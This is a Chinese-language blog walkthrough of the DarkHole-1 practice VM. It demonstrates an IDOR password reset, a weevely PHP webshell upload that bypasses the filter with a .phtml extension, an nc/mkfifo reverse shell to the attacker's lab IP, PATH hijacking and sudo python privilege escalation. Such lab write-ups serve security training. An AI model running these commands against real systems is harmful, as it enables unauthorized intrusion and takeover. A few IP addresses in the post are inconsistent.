Neos的渗透测试靶机练习——DarkHole-1

发布时间:2024年01月18日


一、实验环境

虚拟机软件:VirtualBox
攻击机:kali linux(网卡初始为仅主机模式,要有安全意识)
靶机:DarkHole-1(网卡初始为仅主机模式,要有安全意识)

靶机网卡有问题需要提前修改,进入系统前先按shift,
然后按e进入编辑模式,
将ro 至 initrd之前 的内容修改为 rw single init=/bin/bash,
然后按ctrl + x,重新设置password(输入passwd 然后输入想设置的密码),
输入vim /etc/netplan/00-installer-config.yaml,
将其中的ens33修改为enp0s17,
保存后关靶机,
至此 重启靶机 在攻击机中可搜到ip。

二、开始渗透

1. 搜集信息

输入sudo su,将kali切换到root权限
切换为root权限
输入ifconfig查询自身ip,即攻击机ip
查自身ip
可以看到自身ip192.168.56.101
输入arp-scan -l扫描本网段存活主机,即靶机ip地址
靶机ip
可以看到靶机ip192.168.56.104,。
输入nmap -sV -p- 192.168.56.04扫描靶机所有端口开放情况
靶机端口
可以看到端口22、80是开放的。
浏览器输入192.168.56.116:80。
dh-1
命令行输入whatweb 192.168.56.104查询网站指纹信息
网站指纹

可以看到没什么关键信息。
输入dirsearch -u http://192.168.56.104,扫描网站目录。
扫描结果
可以看到没什么结果,我们重新查看网页,看看有什么可以提交参数的地方

2. sql注入

我们在登陆页面可以注册用户名密码,我们注册一个test1用户,密码为1111111
在这里插入图片描述
注册成功,登陆网站。
在这里插入图片描述
发现url有个参数id=4,且右边可以改密码,我们burp抓包,然后将id=4改为id=1,
在这里插入图片描述
根据朴素的思想,id=1应该是管理员admin的账户,我们这么做,则将admin的密码改为了123456,这是典型的越权。
在这里插入图片描述
修改成功,重新登陆,使用admin登陆。
在这里插入图片描述
发现右边多了一个上传文件的模块,我们尝试上传PHP木马。
我们这里使用weevely生成PHP木马,输入weevely generate Shell Shell.php
在这里插入图片描述
将其上传,发现上传失败,
在这里插入图片描述
判断是识别php文件,我们burp抓包,将文件后缀名改为phtml
在这里插入图片描述
然后点击Send,上传成功。
在这里插入图片描述
可以看到,甚至出来了上传文件路径。
我们weevely链接,输入weevely http://192.168.56.104/upload/Shell.phtml Shell,连接成功。
在这里插入图片描述
/home目录下有一个john用户,进入该目录,发现有一个toto文件。
在这里插入图片描述
其余文件都没有权限查看,执行toto,发现执行的是id命令。
在这里插入图片描述
故我们可以修改环境变量,使之在执行id命令的时候返回john的bash,我们依次输入:

echo "/bin/bash" > /tmp/id
chmod 777 /tmp/id
export PATH=/tmp:$PATH
./toto

输入后发现权限没有改过来,经检查,发现是weevely的问题,我们将shell反到本地,本地命令行输入nc -lvvp 5555监听5555端口,靶机输入rm /tmp/f ; mkfifo /tmp/f;cat /tmp/f | /bin/bash -i 2>&1 | nc 192.168.56.101 5555 >/tmp/f
在这里插入图片描述
然后重新输入

echo "/bin/bash" > /tmp/id
chmod 777 /tmp/id
export PATH=/tmp:$PATH
./toto

在这里插入图片描述
成功切换到john用户,也成功看到了这一阶段的flag,和john的密码。
在这里插入图片描述
john的密码

4. 提权

可能是shell太脆弱了,sudo命令不能用,我们使用ssh登陆。
在这里插入图片描述
重新输入sudo -l,然后要求输入密码root123,查看到了我们想要的,发现file.py文件可以以root权限执行。
在这里插入图片描述
我们在该文件中写入返回root权限shell的代码,依次输入。

echo 'import pty;pty.spawn("/bin/bash")' > file.py
sudo python3 /home/john/file.py

提权成功,在/root目录下获得了最终flag。
在这里插入图片描述
至此,渗透结束。


三、总结

本次渗透测试总体来讲比较简单的,都是以往渗透遇到的经典操作,注意一下越权操作及文件包含漏洞的原理即可。


文章来源:https://blog.csdn.net/qq_38678845/article/details/135675414
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。